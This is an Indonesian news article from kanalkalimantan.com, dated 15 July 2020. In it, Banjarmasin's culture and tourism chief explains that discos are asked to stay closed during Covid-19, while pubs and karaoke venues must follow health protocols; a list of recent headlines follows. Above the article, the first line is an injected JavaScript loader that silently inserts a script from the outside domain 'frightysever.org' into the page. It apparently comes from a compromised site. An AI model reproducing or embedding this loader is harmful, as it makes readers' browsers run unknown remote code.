(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: HEADLINE

Diskotik Tak Boleh Buka Pub dan Karaoke Yes, Ini Penjelasan Kadisbudpar Banjarmasin


KANALKALIMANTAN.COM, BANJARMASIN – Kendati masih masa pandemi Covid-19, beberapa tempat hiburan malam (THM) di kota Banjarmasin membuka operasional. Ini terbukti dengan razia aparat Satpol PP Kota Banjarmasin mendapati ada pengunjung THM yang tidak mematuhi protokol kesehatan.

Lantas, apakah diperbolehkan THM beroperasi kendati kasus Covid-19 di Kota Banjarmasin belum menunjukkan adanya penurunan? Ditemui di kantor, Rabu (15/7/2020) pagi, Kepala Dinas Kebudayaan dan Pariwisata (Disbudpar) Kota Banjarmasin Ekhsan Al Haque mengatakan, dari perspektif jajarannya, sejauh ini masih sebatas mengimbau pengelola THM untuk tidak beroperasi terlebih dahulu.

Baca juga: Pub Disulap Diskotik? Pengelola Ngaku Mainkan Musik Progresif

“Kita mengimbau kepada pelaku usaha (THM), kalau bisa untuk tidak buka dulu. Kalaupun (harus) buka, maka harus menerapkan protokol kesehatan,” kata Ekhsan.

Ia menambahkan, beberapa waktu lalu pihaknya memanggil sejumlah pengelola THM. Di mana, Disbudpar Kota Banjarmasin mengimbau kepada pengelola THM untuk tidak mengoperasikan THM terlebih dahulu.

 

“Surat edaran kita itu belum pernah dicabut, ya. Artinya, (hanya) bersifat imbauan. Berbeda ketika saat PSBB (pembatasan sosial berskala besar) kemarin memang sudah diwajibkan untuk tidak buka,” kata Ekhsan.

THM yang tidak boleh beroperasi pun, saat ini baru sebatas diskotik. Sedangkan untuk pub maupun karaoke tidak diatur dalam kesepakatan dengan pengelola THM beberapa waktu lalu.

Kadisbudpar Kota Banjarmasin Ekhsan Al Haque. foto: fikri

Kendati begitu, Ekhsan menyebutkan bahwa pengelola THM diharuskan untuk menaati protokol kesehatan. Seperti menyediakan tempat cuci tangan, menjaga jarak antar pengunjung THM dan menyemprotkan disinfektan di dalam ruang THM.

Di samping itu, Ekhsan menambahkan bahwa apa yang dilakukan oleh Satpol PP Kota Banjarmasin dengan melakukan razia di dua THM berbeda di Kota Banjarmasin, hanya untuk melihat seberapa jauh penerapan protokol kesehatan.

“Kalau masih ada celah-celahnya, kita minta kepada para pengelola untuk lebih selektif. Artinya, kalau dulu berkerumun maka sekarang harus jaga jarak,” lugas Ekhsan. (kanalkalimantan.com/fikri)

Reporter : fikri
Editor : bie

Al Ghifari

Recent Posts

Soal Pungutan Acara Perpisahan Siswa, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dewan Perwakilan Rakyat Daerah (DPRD) Kota Banjarbaru menyikapi persoalan iuran kegiatan acara… Read More

11 menit ago

Pungutan Acara Perpisahaan Siswa, Begini Respon Wali Kota Aditya

KANALKALIMANTAN.COM, BANJARBARU – Menyikapi pungutan acara perpisahan siswa sekolah di Banjarbaru, Wali Kota Banjarbaru Aditya… Read More

1 jam ago

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

12 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

12 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

12 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

13 jam ago

This website uses cookies.